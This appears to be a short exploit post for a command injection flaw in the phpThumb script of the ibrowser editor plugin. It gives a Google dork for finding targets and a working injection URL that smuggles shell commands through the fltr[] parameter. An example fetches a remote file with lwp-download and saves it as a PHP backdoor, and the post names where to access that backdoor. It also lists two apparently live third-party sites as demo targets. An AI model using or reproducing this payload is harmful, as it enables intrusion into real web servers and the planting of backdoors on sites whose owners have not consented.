======================================
[+]Exploit Title : ibrowser phpthumb Command Injection
[+]Athor : ManToed
[+]Google Dork :
"/ibrowser/scripts/"
======================================
[++] Proof Of Concept :
[+] Exploit : /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;<COMMAND HERE>;&phpThumbDebug=9
You can download backdoor, here i use lwp-download. You can also use Wget
Example :
http://site.com/[path]/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;lwp-download http://site.com/mantod.txt mantod.php;&phpThumbDebug=9
Your access :
/ibrowser/scripts/phpThumb/mantod.php
[-] DEMO :
http://pacbiotech.com/include/module/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php
Greetz : D704T , Indonesian Defacer
======================================